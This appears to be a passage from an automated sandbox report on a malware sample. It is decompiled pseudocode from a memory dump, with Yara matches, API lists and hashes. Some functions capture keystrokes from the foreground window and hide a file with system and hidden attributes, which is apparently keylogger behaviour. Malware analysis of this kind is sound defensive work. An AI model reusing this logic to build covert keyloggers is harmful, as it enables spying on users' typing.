                      											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                      											if(__eflags != 0) {
                      												asm("lock xadd [edx], eax");
                      												if(__eflags == 0) {
                      													E007801F5( *(_t126 + 0x24 + _t131 * 8));
                      													_pop(_t116);
                      													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                      													_t113 = _t116 | 0xffffffff;
                      													__eflags = _t113;
                      												}
                      											}
                      											_t88 = _v40;
                      											__eflags =  *(_t88 + 0x350) & 0x00000002;
                      											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                      												__eflags =  *0x7aa9a4 & 0x00000001;
                      												if(( *0x7aa9a4 & 0x00000001) == 0) {
                      													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                      													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                      														asm("lock xadd [eax], ecx");
                      														__eflags = _t113 == 1;
                      														if(_t113 == 1) {
                      															E007801F5( *(_t126 + 0x24 + _t131 * 8));
                      															_t51 = _t126 + 0x24 + _t131 * 8;
                      															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                      															__eflags =  *_t51;
                      														}
                      													}
                      												}
                      											}
                      											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                      											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                      											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                      											_v8 = 0xfffffffe;
                      											E0077F33F();
                      										} else {
                      											__eflags = _t86 - 0x16;
                      											if(_t86 == 0x16) {
                      												L26:
                      												_push(_t125);
                      												_push(_t125);
                      												_push(_t125);
                      												_push(_t125);
                      												_push(_t125);
                      												goto L20;
                      											} else {
                      												__eflags = _t86 - 0x22;
                      												if(_t86 != 0x22) {
                      													__eflags = _t86;
                      													if(_t86 == 0) {
                      														goto L29;
                      													} else {
                      														E007801F5(_t99);
                      														goto L15;
                      													}
                      												} else {
                      													goto L26;
                      												}
                      											}
                      										}
                      									}
                      								} else {
                      									__eflags = _t79 - 0x16;
                      									if(_t79 == 0x16) {
                      										L19:
                      										_push(0);
                      										_push(0);
                      										_push(0);
                      										_push(0);
                      										_push(0);
                      										L20:
                      										_t79 = E0077698A();
                      									} else {
                      										__eflags = _t79 - 0x22;
                      										if(_t79 == 0x22) {
                      											goto L19;
                      										}
                      									}
                      									__eflags = _t79;
                      									if(_t79 != 0) {
                      										goto L15;
                      									} else {
                      										goto L22;
                      									}
                      								}
                      							} else {
                      								L15:
                      							}
                      							return E0076FBA6();
                      						} else {
                      							__eflags = _t67 - 0x22;
                      							if(_t67 == 0x22) {
                      								goto L13;
                      							} else {
                      								goto L5;
                      							}
                      						}
                      					}
                      				} else {
                      					_t70 = E0077E4D0(__ebx, _t101, __edx, _a4, 0);
                      					L12:
                      					return _t70;
                      				}
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: __cftoe
                      • String ID:
                      • API String ID: 4189289331-0
                      • Opcode ID: 136b1d6672bdedd2ab766fc2b6117e00bae104701dff573f5fcd35fdd8a3d127
                      • Instruction ID: f6f5c75c97aca194b6bf98089bff4ba2d350e25963a29f8df1032de980eb359e
                      • Opcode Fuzzy Hash: 136b1d6672bdedd2ab766fc2b6117e00bae104701dff573f5fcd35fdd8a3d127
                      • Instruction Fuzzy Hash: 7251EA76900205EBDF249B68CD45FAE77A9BF493B0F50C139F91DD6182DB3DD9008A64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00748C71(void* __ecx, long __edx) {
                      				char _v1028;
                      				char _v1040;
                      				char _v1064;
                      				char _v1076;
                      				void* _v1080;
                      				void* _v1088;
                      				void* _v1092;
                      				char _v1100;
                      				char _v1124;
                      				void* _v1132;
                      				char _v1136;
                      				void* _v1152;
                      				void* __ebx;
                      				void* __esi;
                      				void* __ebp;
                      				signed char _t34;
                      				char* _t36;
                      				void* _t38;
                      				int _t42;
                      				void* _t49;
                      				void* _t53;
                      				void* _t65;
                      				int _t66;
                      				void* _t68;
                      				char _t74;
                      				void* _t75;
                      				void* _t76;
                      				void* _t83;
                      				signed int _t141;
                      				signed int _t142;
                      				void* _t143;
                      				void* _t144;
                      				signed int _t145;
                      
                      				_t131 = __edx;
                      				_t142 = _t141 & 0xfffffff8;
                      				_t145 = _t142;
                      				_t143 = _t142 - 0x464;
                      				_t83 = __ecx;
                      				_t136 = __ecx + 4;
                      				do {
                      					Sleep(0x1388);
                      					E00748BC0(_t83, _t131);
                      					_t131 = 0x79f724;
                      					if(E007474E4(_t145) != 0) {
                      						if(E00749DB5() == 0) {
                      							CreateDirectoryW(E00741EEB(0x7ac3c8), 0);
                      						}
                      						_t133 = _t83 + 0x60;
                      						_t34 = GetFileAttributesW(E00741EEB(_t83 + 0x60));
                      						_t148 = _t34 & 0x00000002;
                      						if((_t34 & 0x00000002) != 0) {
                      							SetFileAttributesW(E00741EEB(_t133), 0x80);
                      						}
                      						_t36 = E00741F95(E00741E49(0x7ac578, _t131, _t148, 0x12));
                      						_t149 =  *_t36;
                      						if( *_t36 != 0) {
                      							E007420D5(_t83,  &_v1124);
                      							_t38 = E00742489();
                      							E00745A7C( &_v1028, E00741F95(0x7ac560), _t38);
                      							_t42 = PathFileExistsW(E00741EEB(_t133));
                      							__eflags = _t42;
                      							if(_t42 != 0) {
                      								E007420D5(_t83,  &_v1100);
                      								_t65 = E00741EEB(_t133);
                      								_t131 =  &_v1100;
                      								_t66 = E007579DC(_t65,  &_v1100);
                      								__eflags = _t66;
                      								if(_t66 != 0) {
                      									_t68 = E00742489();
                      									E00741FD1( &_v1136,  &_v1100, _t136, E00745BA4(_t83,  &_v1028,  &_v1100,  &_v1076, E00741F95( &_v1100), _t68));
                      									E00741FC7();
                      								}
                      								E00741FC7();
                      							}
                      							__eflags = E00742489() + _t43;
                      							E00743436(E007420AB(_t83,  &_v1076, _t131, __eflags, E00741EEB(_t136), E00742489() + _t43));
                      							E00741FC7();
                      							_t49 = E00742489();
                      							E00745BA4(_t83,  &_v1040, _t131,  &_v1064, E00741F95( &_v1136), _t49);
                      							_t53 = E00741EEB(_t133);
                      							_t144 = _t143 - 0x18;
                      							E007420EC(_t83, _t144, _t131, __eflags,  &_v1076);
                      							E00757A4E(_t53);
                      							_t143 = _t144 + 0x18;
                      							E00741FC7();
                      							E00741FC7();
                      						} else {
                      							_t74 = E00741EEB(_t133);
                      							_t75 = E00742489();
                      							_t76 = E00741EEB(_t83 + 4);
                      							_t131 = _t75 + _t75;
                      							E00757947(_t76, _t75 + _t75, _t74, 1);
                      						}
                      						_t136 = _t83 + 4;
                      						E00749DC9(_t83, _t83 + 4, 0x79f724);
                      						if( *((char*)(E00741F95(E00741E49(0x7ac578, _t131, _t149, 0x13)))) != 0) {
                      							SetFileAttributesW(E00741EEB(_t133), 6);
                      						}
                      					}
                      				} while ( *((char*)(_t83 + 0x49)) != 0);
                      				return 0;
                      			}

                      APIs
                      • Sleep.KERNEL32(00001388), ref: 00748C8A
                        • Part of subcall function 00748BC0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00748C97), ref: 00748BF6
                        • Part of subcall function 00748BC0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00748C97), ref: 00748C05
                        • Part of subcall function 00748BC0: Sleep.KERNEL32(00002710,?,?,?,00748C97), ref: 00748C32
                        • Part of subcall function 00748BC0: CloseHandle.KERNEL32(00000000,?,?,?,00748C97), ref: 00748C39
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00748CC6
                      • GetFileAttributesW.KERNEL32(00000000), ref: 00748CD7
                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00748CEE
                      • PathFileExistsW.SHLWAPI(00000000,00000012), ref: 00748D69
                        • Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9
                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0079F724), ref: 00748E85
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                      • String ID:
                      • API String ID: 3795512280-0
                      • Opcode ID: 7d33c3d866e5de5c13360a2090b2ce5c536e39a30dd9177d4f760c84d0df7e81
                      • Instruction ID: cbbf3fba6d3baef66fd6fd06c3200a731f33977a10e359a0983840d9fa81f4c4
                      • Opcode Fuzzy Hash: 7d33c3d866e5de5c13360a2090b2ce5c536e39a30dd9177d4f760c84d0df7e81
                      • Instruction Fuzzy Hash: E851B471604300DBCB19FB74886A9BF76A59FC1300F844919F5429B1D3DF2C9D4AC656
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E00780FE4(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                      				signed int _v8;
                      				short _v10;
                      				short _v12;
                      				short _v14;
                      				short _v16;
                      				short _v18;
                      				short _v22;
                      				char _v24;
                      				signed int _v28;
                      				signed int* _v32;
                      				signed int _v33;
                      				signed int** _v40;
                      				intOrPtr _v44;
                      				intOrPtr* _v48;
                      				intOrPtr _v52;
                      				void* _v64;
                      				signed int _t86;
                      				intOrPtr _t91;
                      				signed int _t94;
                      				signed int _t95;
                      				signed int _t96;
                      				void* _t97;
                      				signed int _t98;
                      				signed int _t102;
                      				signed int _t103;
                      				signed int _t104;
                      				intOrPtr _t105;
                      				signed int _t110;
                      				void* _t111;
                      				signed int _t116;
                      				signed int _t117;
                      				signed int _t129;
                      				void* _t133;
                      				signed int _t135;
                      				intOrPtr _t143;
                      				signed short* _t144;
                      				intOrPtr _t145;
                      				signed int** _t146;
                      				signed int _t147;
                      				signed int* _t148;
                      				signed int _t149;
                      				signed int _t152;
                      				signed short** _t154;
                      				signed int _t155;
                      				signed int _t159;
                      				signed int _t163;
                      				intOrPtr* _t171;
                      				signed short _t172;
                      				signed short* _t173;
                      				signed int** _t174;
                      				void* _t175;
                      				void* _t177;
                      				signed short* _t179;
                      				intOrPtr* _t180;
                      				intOrPtr* _t181;
                      				signed int* _t183;
                      				signed int _t184;
                      				signed int** _t185;
                      				signed int _t186;
                      				signed int _t187;
                      				signed int _t188;
                      
                      				_t149 = __ecx;
                      				_t86 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t86 ^ _t187;
                      				_t171 = _a12;
                      				_v52 = _a4;
                      				_t143 = _a24;
                      				_v40 = _a16;
                      				_v48 = _t171;
                      				_v44 = _t143;
                      				_t183 = _a20;
                      				_v32 = _t183;
                      				_t91 = _a8;
                      				if(_t91 == 0) {
                      					_t179 =  *(_t143 + 0x154);
                      				} else {
                      					if(_t91 == 1) {
                      						_t179 =  *(_t143 + 0x158);
                      					} else {
                      						_t179 =  *(_t143 + 0x15c);
                      					}
                      				}
                      				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
                      					goto L113;
                      				} else {
                      					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
                      					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
                      					_v33 = _t163;
                      					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
                      					_v18 =  *((intOrPtr*)(_t171 + 0xc));
                      					_v16 =  *((intOrPtr*)(_t171 + 8));
                      					_v14 =  *((intOrPtr*)(_t171 + 4));
                      					_v12 =  *_t171;
                      					_v10 = 0;
                      					_t194 = _t163;
                      					if(_t163 == 0) {
                      						__eflags = 0;
                      						_t129 = E00782338(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
                      					} else {
                      						_t129 = E0078247A(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
                      					}
                      					_t147 = _t129;
                      					if(_t147 == 0) {
                      						goto L113;
                      					} else {
                      						_t175 = _t147 + _t147;
                      						_t165 = _t175 + 8;
                      						asm("sbb eax, eax");
                      						if((_t175 + 0x00000008 & _t129) == 0) {
                      							_t184 = 0;
                      							__eflags = 0;
                      							L18:
                      							_v28 = _t184;
                      							if(_t184 == 0) {
                      								L30:
                      								E00770BA0(0);
                      								_t183 = _v32;
                      								while(1) {
                      									L113:
                      									_t172 =  *_t179 & 0x0000ffff;
                      									__eflags = _t172;
                      									if(_t172 == 0) {
                      										break;
                      									}
                      									__eflags =  *_t183;
                      									if( *_t183 == 0) {
                      										L28:
                      										L29:
                      										return E0076FD1B(_v8 ^ _t187);
                      									}
                      									_v32 = 0;
                      									_t152 = 0;
                      									__eflags = 0;
                      									_v28 = _t179;
                      									_t144 = _t179;
                      									_t94 = _t172 & 0x0000ffff;
                      									do {
                      										_t144 =  &(_t144[1]);
                      										_t152 = _t152 + 1;
                      										__eflags =  *_t144 - _t94;
                      									} while ( *_t144 == _t94);
                      									_t95 = _t172 & 0x0000ffff;
                      									_v28 = _t144;
                      									_t145 = _v44;
                      									__eflags = _t95 - 0x64;
                      									if(__eflags > 0) {
                      										_t96 = _t95 - 0x68;
                      										__eflags = _t96;
                      										if(_t96 == 0) {
                      											_t153 = _t152 - 1;
                      											__eflags = _t153;
                      											if(_t153 == 0) {
                      												_v32 = 1;
                      												L110:
                      												_push(0x49);
                      												L111:
                      												_pop(_t97);
                      												_t98 = E007803AE(_t145, _t153, _t179, _v52, _t97, _v48, _v40, _t183, _t145, _v32);
                      												_t188 = _t188 + 0x1c;
                      												__eflags = _t98;
                      												if(_t98 == 0) {
                      													 *((intOrPtr*)(E0077A504())) = 0x16;
                      													goto L29;
                      												}
                      												L112:
                      												_t179 = _v28;
                      												continue;
                      											}
                      											_t153 = _t153 - 1;
                      											__eflags = _t153;
                      											if(_t153 == 0) {
                      												goto L110;
                      											}
                      											L108:
                      											_t154 = _v40;
                      											_t179 =  &(_t179[1]);
                      											 *( *_t154) = _t172;
                      											 *_t154 =  &(( *_t154)[1]);
                      											 *_t183 =  *_t183 - 1;
                      											continue;
                      										}
                      										_t102 = _t96 - 5;
                      										__eflags = _t102;
                      										if(_t102 == 0) {
                      											_t153 = _t152 - 1;
                      											__eflags = _t153;
                      											if(_t153 == 0) {
                      												_v32 = 1;
                      												L105:
                      												_push(0x4d);
                      												goto L111;
                      											}
                      											_t153 = _t153 - 1;
                      											__eflags = _t153;
                      											if(_t153 == 0) {
                      												goto L105;
                      											}
                      											goto L108;
                      										}
                      										_t103 = _t102 - 6;
                      										__eflags = _t103;
                      										if(_t103 == 0) {
                      											_t153 = _t152 - 1;
                      											__eflags = _t153;
                      											if(_t153 == 0) {
                      												_v32 = 1;
                      												L100:
                      												_push(0x53);
                      												goto L111;
                      											}
                      											_t153 = _t153 - 1;
                      											__eflags = _t153;
                      											if(_t153 == 0) {
                      												goto L100;
                      											}
                      											goto L108;
                      										}
                      										_t104 = _t103 - 1;
                      										__eflags = _t104;
                      										if(_t104 == 0) {
                      											_t105 = _v48;
                      											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
                      											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
                      												_t173 =  *(_t145 + 0x150);
                      											} else {
                      												_t173 =  *(_t145 + 0x14c);
                      											}
                      											__eflags = _t152 - 1;
                      											if(_t152 != 1) {
                      												L91:
                      												_t155 =  *_t173 & 0x0000ffff;
                      												__eflags = _t155;
                      												if(_t155 == 0) {
                      													goto L112;
                      												}
                      												_t146 = _v40;
                      												while(1) {
                      													__eflags =  *_t183;
                      													if( *_t183 <= 0) {
                      														goto L112;
                      													}
                      													_t173 =  &(_t173[1]);
                      													 *( *_t146) = _t155;
                      													 *_t146 =  &(( *_t146)[0]);
                      													 *_t183 =  *_t183 - 1;
                      													_t155 =  *_t173 & 0x0000ffff;
                      													__eflags = _t155;
                      													if(_t155 != 0) {
                      														continue;
                      													}
                      													goto L112;
                      												}
                      											} else {
                      												__eflags =  *_t183;
                      												if( *_t183 <= 0) {
                      													goto L91;
                      												}
                      												_t180 = _v40;
                      												 *((short*)( *_t180)) =  *_t173;
                      												 *_t180 =  *_t180 + 2;
                      												 *_t183 =  *_t183 - 1;
                      											}
                      											goto L112;
                      										}
                      										__eflags = _t104 != 5;
                      										if(_t104 != 5) {
                      											goto L108;
                      										}
                      										_t153 = _t152;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											_push(0x79);
                      											goto L111;
                      										}
                      										_t153 = _t153;
                      										__eflags = _t153;
                      										if(_t153 != 0) {
                      											goto L108;
                      										}
                      										_push(0x59);
                      										goto L111;
                      									}
                      									if(__eflags == 0) {
                      										_t153 = _t152 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											_v32 = 1;
                      											L75:
                      											_push(0x64);
                      											goto L111;
                      										}
                      										_t153 = _t153 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											goto L75;
                      										}
                      										_t153 = _t153 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											_push(0x61);
                      											goto L111;
                      										}
                      										_t153 = _t153 - 1;
                      										__eflags = _t153;
                      										if(_t153 != 0) {
                      											goto L108;
                      										}
                      										_push(0x41);
                      										goto L111;
                      									}
                      									__eflags = _t95 - 0x27;
                      									if(_t95 == 0x27) {
                      										_t110 = _t152 & 0x80000001;
                      										__eflags = _t110;
                      										if(__eflags < 0) {
                      											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
                      										}
                      										_t179 =  &(_t179[_t152]);
                      										if(__eflags == 0) {
                      											_t159 =  *_t179 & 0x0000ffff;
                      											__eflags = _t159;
                      											if(_t159 == 0) {
                      												goto L28;
                      											}
                      											_t174 = _v40;
                      											while(1) {
                      												__eflags =  *_t183;
                      												if( *_t183 == 0) {
                      													goto L113;
                      												}
                      												_t111 = 0x27;
                      												_t179 =  &(_t179[1]);
                      												__eflags = _t159 - _t111;
                      												if(_t159 == _t111) {
                      													goto L113;
                      												}
                      												 *( *_t174) = _t159;
                      												 *_t174 =  &(( *_t174)[0]);
                      												 *_t183 =  *_t183 - 1;
                      												_t159 =  *_t179 & 0x0000ffff;
                      												__eflags = _t159;
                      												if(_t159 != 0) {
                      													continue;
                      												}
                      												goto L113;
                      											}
                      										}
                      										continue;
                      									}
                      									__eflags = _t95 - 0x41;
                      									if(_t95 == 0x41) {
                      										L41:
                      										_t116 = E0078CF51(_t145, _t179, _t183, _t179, L"am/pm");
                      										__eflags = _t116;
                      										if(_t116 != 0) {
                      											_t117 = E0078CF51(_t145, _t179, _t183, _t179, L"a/p");
                      											_pop(_t153);
                      											__eflags = _t117;
                      											if(_t117 == 0) {
                      												_v28 =  &(_t179[3]);
                      											}
                      										} else {
                      											_t153 =  &(_t179[5]);
                      											_v28 =  &(_t179[5]);
                      										}
                      										_push(0x70);
                      										goto L111;
                      									}
                      									__eflags = _t95 - 0x48;
                      									if(_t95 == 0x48) {
                      										_t153 = _t152 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											_v32 = 1;
                      											L55:
                      											_push(0x48);
                      											goto L111;
                      										}
                      										_t153 = _t153 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											goto L55;
                      										}
                      										goto L108;
                      									}
                      									__eflags = _t95 - 0x4d;
                      									if(_t95 == 0x4d) {
                      										_t153 = _t152 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											_v32 = 1;
                      											L50:
                      											_push(0x6d);
                      											goto L111;
                      										}
                      										_t153 = _t153 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											goto L50;
                      										}
                      										_t153 = _t153 - 1;
                      										__eflags = _t153;
                      										if(_t153 == 0) {
                      											_push(0x62);
                      											goto L111;
                      										}
                      										_t153 = _t153 - 1;
                      										__eflags = _t153;
                      										if(_t153 != 0) {
                      											goto L108;
                      										}
                      										_push(0x42);
                      										goto L111;
                      									}
                      									__eflags = _t95 - 0x61;
                      									if(_t95 != 0x61) {
                      										goto L108;
                      									}
                      									goto L41;
                      								}
                      								goto L28;
                      							}
                      							_t203 = _v33;
                      							if(_v33 == 0) {
                      								_t133 = E00782338(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
                      							} else {
                      								_t133 = E0078247A(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
                      							}
                      							_t181 = _t184;
                      							_t177 = _t133 - 1;
                      							if(_t177 <= 0) {
                      								L27:
                      								E00770BA0(_t184);
                      								goto L28;
                      							} else {
                      								_t148 = _v32;
                      								_t185 = _v40;
                      								while( *_t148 > 0) {
                      									_t135 =  *_t181;
                      									_t181 = _t181 + 2;
                      									 *( *_t185) = _t135;
                      									 *_t185 =  &(( *_t185)[0]);
                      									 *_t148 =  *_t148 - 1;
                      									_t177 = _t177 - 1;
                      									if(_t177 > 0) {
                      										continue;
                      									}
                      									break;
                      								}
                      								_t184 = _v28;
                      								goto L27;
                      							}
                      						}
                      						asm("sbb eax, eax");
                      						_t137 = _t129 & _t175 + 0x00000008;
                      						_t165 = _t175 + 8;
                      						if((_t129 & _t175 + 0x00000008) > 0x400) {
                      							__eflags = _t175 - _t165;
                      							asm("sbb eax, eax");
                      							_t186 = E0077F98C(_t165, _t137 & _t165);
                      							_v28 = _t186;
                      							_pop(_t165);
                      							__eflags = _t186;
                      							if(__eflags == 0) {
                      								goto L30;
                      							}
                      							 *_t186 = 0xdddd;
                      							L14:
                      							_t184 = _t186 + 8;
                      							goto L18;
                      						}
                      						asm("sbb eax, eax");
                      						E00790810();
                      						_t186 = _t188;
                      						_v28 = _t186;
                      						if(_t186 == 0) {
                      							goto L30;
                      						}
                      						 *_t186 = 0xcccc;
                      						goto L14;
                      					}
                      				}
                      			}
                      0x007812fd
                      0x00781300
                      0x00000000
                      0x00000000
                      0x00781306
                      0x00000000
                      0x00781306
                      0x007811f6
                      0x007811f9
                      0x0078129b
                      0x0078129b
                      0x007812a0
                      0x007812a6
                      0x007812a6
                      0x007812a7
                      0x007812aa
                      0x007812b0
                      0x007812b3
                      0x007812b6
                      0x00000000
                      0x00000000
                      0x007812bc
                      0x007812bf
                      0x007812bf
                      0x007812c2
                      0x00000000
                      0x00000000
                      0x007812ca
                      0x007812cb
                      0x007812ce
                      0x007812d1
                      0x00000000
                      0x00000000
                      0x007812d9
                      0x007812dc
                      0x007812df
                      0x007812e1
                      0x007812e4
                      0x007812e7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x007812e9
                      0x007812bf
                      0x00000000
                      0x007812aa
                      0x007811ff
                      0x00781202
                      0x00781217
                      0x0078121d
                      0x00781224
                      0x00781226
                      0x00781281
                      0x00781287
                      0x00781288
                      0x0078128a
                      0x0078128f
                      0x0078128f
                      0x00781228
                      0x00781228
                      0x0078122b
                      0x0078122b
                      0x00781292
                      0x00000000
                      0x00781292
                      0x00781204
                      0x00781207
                      0x00781261
                      0x00781261
                      0x00781264
                      0x00781270
                      0x00781274
                      0x00781274
                      0x00000000
                      0x00781274
                      0x00781266
                      0x00781266
                      0x00781269
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0078126b
                      0x00781209
                      0x0078120c
                      0x00781230
                      0x00781230
                      0x00781233
                      0x00781256
                      0x0078125a
                      0x0078125a
                      0x00000000
                      0x0078125a
                      0x00781235
                      0x00781235
                      0x00781238
                      0x00000000
                      0x00000000
                      0x0078123a
                      0x0078123a
                      0x0078123d
                      0x0078124f
                      0x00000000
                      0x0078124f
                      0x0078123f
                      0x0078123f
                      0x00781242
                      0x00000000
                      0x00000000
                      0x00781248
                      0x00000000
                      0x00781248
                      0x0078120e
                      0x00781211
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00781211
                      0x00000000
                      0x0078143c
                      0x00781134
                      0x0078113b
                      0x00781164
                      0x0078113d
                      0x0078114c
                      0x0078114c
                      0x0078116b
                      0x0078116d
                      0x00781170
                      0x00781195
                      0x00781196
                      0x00000000
                      0x00781172
                      0x00781172
                      0x00781175
                      0x00781178
                      0x0078117f
                      0x00781182
                      0x00781185
                      0x00781188
                      0x0078118b
                      0x0078118d
                      0x00781190
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00781190
                      0x00781192
                      0x00000000
                      0x00781192
                      0x00781170
                      0x007810d8
                      0x007810da
                      0x007810dc
                      0x007810e4
                      0x00781109
                      0x0078110b
                      0x00781115
                      0x00781117
                      0x0078111a
                      0x0078111b
                      0x0078111d
                      0x00000000
                      0x00000000
                      0x00781123
                      0x00781104
                      0x00781104
                      0x00000000
                      0x00781104
                      0x007810e8
                      0x007810ec
                      0x007810f1
                      0x007810f3
                      0x007810f8
                      0x00000000
                      0x00000000
                      0x007810fe
                      0x00000000
                      0x007810fe
                      0x007810bf

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: __freea$__alloca_probe_16_free
                      • String ID: a/p$am/pm
                      • API String ID: 2936374016-3206640213
                      • Opcode ID: 14343051048124d5262d5e92a28a12b686e14a8ec4d0d511b87f56b1c56cce0a
                      • Instruction ID: 84b2f08f4e875f693949a793100033d1bad5a51be36b8eed9c879c6235b96e97
                      • Opcode Fuzzy Hash: 14343051048124d5262d5e92a28a12b686e14a8ec4d0d511b87f56b1c56cce0a
                      • Instruction Fuzzy Hash: 64D14870990246CBCB24BF68C859BBAB7B9FF05300FA44159EA05DB641D33D9D83CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E007489BA(void* __ecx, intOrPtr _a4) {
                      				long _v8;
                      				void _v38;
                      				short _v40;
                      				char _v296;
                      				void* __ebx;
                      				void* __edi;
                      				struct HKL__* _t20;
                      				void* _t30;
                      				signed int _t32;
                      				void* _t36;
                      
                      				_t30 = __ecx;
                      				E00771F00(_t36,  &_v296, 0, 0x100);
                      				_v40 = 0;
                      				_t32 = 7;
                      				memset( &_v38, 0, _t32 << 2);
                      				asm("stosw");
                      				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
                      				GetKeyState(0x10);
                      				GetKeyboardState( &_v296);
                      				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
                      				E0074427F(_t30, _a4,  &_v40);
                      				return _a4;
                      			}

                      0x007489d1
                      0x007489d6
                      0x007489e3
                      0x007489e9
                      0x007489ea
                      0x007489ec
                      0x00748a00
                      0x00748a0a
                      0x00748a17
                      0x00748a33
                      0x00748a40
                      0x00748a4e

                      APIs
                      • GetForegroundWindow.USER32(00000000,?,00000000), ref: 007489EE
                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 007489F9
                      • GetKeyboardLayout.USER32 ref: 00748A00
                      • GetKeyState.USER32(00000010), ref: 00748A0A
                      • GetKeyboardState.USER32(?), ref: 00748A17
                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00748A33
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                      • String ID:
                      • API String ID: 3566172867-0
                      • Opcode ID: 976d92967587331ccd6f1cb87d357d2f2da790c8e1dbdd0afe5b2561d8ba4870
                      • Instruction ID: 27b0bb0af1c0eb5bec4c7ee5447fe5d8a37a7f8d4a42f2c08ce3bd9691666d90
                      • Opcode Fuzzy Hash: 976d92967587331ccd6f1cb87d357d2f2da790c8e1dbdd0afe5b2561d8ba4870
                      • Instruction Fuzzy Hash: 3D11527294020CBBDB10DBE4DC49FEA7BBCFB0C345F004456FA04E6150DA79AE558B64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00781CE2(void* __ebx, void* __ecx, void* __edx) {
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t2;
                      				void* _t3;
                      				void* _t4;
                      				intOrPtr _t9;
                      				void* _t11;
                      				void* _t20;
                      				void* _t21;
                      				void* _t23;
                      				void* _t25;
                      				void* _t27;
                      				void* _t29;
                      				void* _t31;
                      				void* _t32;
                      				long _t36;
                      				long _t37;
                      				void* _t40;
                      
                      				_t29 = __edx;
                      				_t23 = __ecx;
                      				_t20 = __ebx;
                      				_t36 = GetLastError();
                      				_t2 =  *0x7aa1e0; // 0x6
                      				_t42 = _t2 - 0xffffffff;
                      				if(_t2 == 0xffffffff) {
                      					L2:
                      					_t3 = E0077F348(_t23, 1, 0x364);
                      					_t31 = _t3;
                      					_pop(_t25);
                      					if(_t31 != 0) {
                      						_t4 = E007822DF(_t25, _t36, __eflags,  *0x7aa1e0, _t31);
                      						__eflags = _t4;
                      						if(_t4 != 0) {
                      							E00781B54(_t25, _t31, 0x7ab654);
                      							E007801F5(0);
                      							_t40 = _t40 + 0xc;
                      							__eflags = _t31;
